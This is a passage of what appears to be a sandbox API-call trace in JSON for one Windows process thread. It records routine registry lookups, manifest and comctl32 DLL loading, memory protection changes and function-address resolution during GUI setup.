"value": "no" } ], "repeated": 0, "id": 889 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 890 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00000109", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" } ], "repeated": 0, "id": 891 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000101", "pretty_value": "KEY_QUERY_VALUE|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000288" }, { "name": "ObjectAttributesName", "value": "MS Sans Serif" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\MS Sans Serif" } ], "repeated": 0, "id": 892 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 893 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0045bd0f", "parentcaller": "0x0045d6b0", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a975000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 894 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x0046084b", "parentcaller": "0x0045ef2e", "category": "misc", "api": "SystemParametersInfoA", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00000030" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 895 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x004377fe", "parentcaller": "0x00458e8b", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "CC32SubclassInfo" }, { "name": "Atom", "value": "0x0000c017" } ], "repeated": 0, "id": 896 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" } ], "repeated": 0, "id": 897 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "PreferExternalManifest" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest" } ], "repeated": 0, "id": 898 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 899 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtOpenFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x001200a9", "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll.Config" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 900 }, { "timestamp": "2025-03-02 21:32:33,420", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00120089", "pretty_value": "FILE_GENERIC_READ" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 901 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "7632" }, { "name": "Module", "value": "KERNEL32.DLL" }, { "name": "Return Address", "value": "0x7588274c" } ], "repeated": 0, "id": 902 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 903 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000008", "pretty_value": "KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\AssemblyStorageRoots" } ], "repeated": 0, "id": 904 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00100020", "pretty_value": "FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" } ], "repeated": 0, "id": 905 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c\\comctl32.dll" } ], "repeated": 0, "id": 906 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000290" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c\\comctl32.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 907 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000294" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000290" } ], "repeated": 0, "id": 908 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000294" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73d70000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00210000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 909 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73f20000" }, { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 910 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 911 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 912 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73f1b000" }, { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 913 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73f1b000" }, { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 914 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00w\\x00s\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00e\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00x\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00e\\x00.\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00C\\x00o\\x00" } ], "repeated": 0, "id": 915 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000294" } ], "repeated": 0, "id": 916 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 917 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c\\comctl32" }, { "name": "DllBase", "value": "0x73d70000" } ], "repeated": 0, "id": 918 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x001200a9", "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE" }, { "name": "FileName", "value": "C:\\Windows\\WindowsShell.Manifest" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 919 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000294" }, { "name": "DesiredAccess", "value": "0x00000004", "pretty_value": "SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x0000028c" } ], "repeated": 0, "id": 920 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000294" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a920000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 921 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000298" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" } ], "repeated": 0, "id": 922 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000298" }, { "name": "ValueName", "value": "PreferExternalManifest" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest" } ], "repeated": 0, "id": 923 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 924 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000028c" }, { "name": "HandleName", "value": "C:\\Windows\\WindowsShell.Manifest" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x9e\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 925 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "7632" }, { "name": "Module", "value": "KERNEL32.DLL" }, { "name": "Return Address", "value": "0x7588274c" } ], "repeated": 0, "id": 926 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 927 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000294" } ], "repeated": 0, "id": 928 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0a920000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 929 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "ThemePropScrollBarCtl" }, { "name": "Atom", "value": "0x0000c020" } ], "repeated": 0, "id": 930 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "synchronization", "api": "NtAddAtomEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "MicrosoftTabletPenServiceProperty" }, { "name": "Atom", "value": "0x0000c021" } ], "repeated": 0, "id": 931 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00001022" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 932 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "LPK" }, { "name": "ModuleHandle", "value": "0x0049414e" } ], "repeated": 0, "id": 933 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "GDI32" }, { "name": "ModuleHandle", "value": "0x77060000" } ], "repeated": 0, "id": 934 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "ModuleHandle", "value": "0x77060000" }, { "name": "FunctionName", "value": "LpkEditControl" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7707c440" } ], "repeated": 0, "id": 935 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.4355_none_a865f0c28672571c\\comctl32" }, { "name": "BaseAddress", "value": "0x73d70000" }, { "name": "InitRoutine", "value": "0x73df5560" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 936 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "HIMAGELIST_QueryInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73dcee70" } ], "repeated": 0, "id": 937 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "DrawShadowText" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73e39540" } ], "repeated": 0, "id": 938 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "DrawSizeBox" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73de6df0" } ], "repeated": 0, "id": 939 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "DrawScrollBar" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73de77c0" } ], "repeated": 0, "id": 940 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "SizeBoxHwnd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73dea280" } ], "repeated": 0, "id": 941 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "ScrollBar_MouseMove" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73e31e30" } ], "repeated": 0, "id": 942 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "ScrollBar_Menu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73e31c70" } ], "repeated": 0, "id": 943 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "HandleScrollCmd" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73e31be0" } ], "repeated": 0, "id": 944 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "DetachScrollBars" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73de6f80" } ], "repeated": 0, "id": 945 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "AttachScrollBars" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73de6f60" } ], "repeated": 0, "id": 946 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "CCSetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73de81e0" } ], "repeated": 0, "id": 947 }, { "timestamp": "2025-03-02 21:32:33,435", "thread_id": "7632", "caller": "0x00459021", "parentcaller": "0x00459409", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "comctl32.DLL" }, { "name": "ModuleHandle", "value": "0x73d70000" }, { "name": "FunctionName", "value": "CCGetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x73dec260" } ], "repeated": 0, "id": 948 }, { "timestamp": "2025-03-02 